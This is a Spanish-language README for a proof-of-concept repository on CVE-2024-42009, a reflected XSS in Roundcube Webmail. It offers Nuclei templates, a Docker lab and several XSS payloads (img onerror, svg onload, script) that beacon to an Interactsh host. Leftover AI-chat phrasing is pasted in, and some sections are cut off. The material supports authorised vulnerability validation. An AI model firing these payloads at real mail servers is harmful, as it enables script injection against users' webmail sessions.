
Plantillas de Nuclei y laboratorio Docker para demostrar y validar CVE-2024-42009, un XSS reflejado en Roundcube Webmail, utilizando detección fuera de banda a través de Interactsh para pruebas autorizadas.
Este repositorio contiene una plantilla de Nuclei y recursos complementarios para demostrar y validar de forma segura CVE-2024-42009, una vulnerabilidad crítica de XSS reflejado en Roundcube Webmail. El fallo reside en la función message_body() en show.php, donde modificaciones posteriores a la sanitización provocan una desanitización y un renderizado inseguro del contenido de correo HTML manipulado.
⚠️ Este PoC está destinado únicamente a fines educativos y pruebas autorizadas. No lo utilice contra sistemas que no posea o para los que no tenga permiso explícito.
message_body() en show.phpEste repositorio utiliza detección Fuera de Banda (OOB) mediante Interactsh para confirmar la ejecución de JavaScript en un laboratorio controlado.
<body> que contenga onanimationstart y un beacon a InteractshUtilice el archivo Docker Compose proporcionado para poner en marcha una instancia local de Roundcube con MailHog (sumidero SMTP) y MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ No utilice su cuenta de Google.
CVE-2024-42009-OOB.yaml – Plantilla de Nuclei con detección Interactsh y Fuera de Banda (OOB)CVE-2024-42009.yaml – Plantilla de Nuclei sin Interactsh ni OOBdocker-compose.yml – Configuración del entorno de laboratorio para Roundcube WebmailImages/ – Capturas de pantalla que muestran accesos HTTP/DNS desde InteractshEste video recorre toda la cadena de explotación:
Para incluir de forma responsable esos payloads XSS en tu README, deberías colocarlos en una sección claramente etiquetada con fines educativos o de pruebas. Aquí tienes una estructura sugerida:
⚠️ Aviso: Estos payloads están destinados únicamente a fines educativos y pruebas de seguridad autorizadas. No los implemente en sistemas sin permiso explícito.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit con su propio endpoint de escucha.Actualice Roundcube a:
Perfecto: aquí tienes una sección de Referencias limpia y profesional que puedes incluir en tu README o envío por correo para CVE-2024-42009. Cita todas las fuentes que has listado, formateadas para claridad y credibilidad: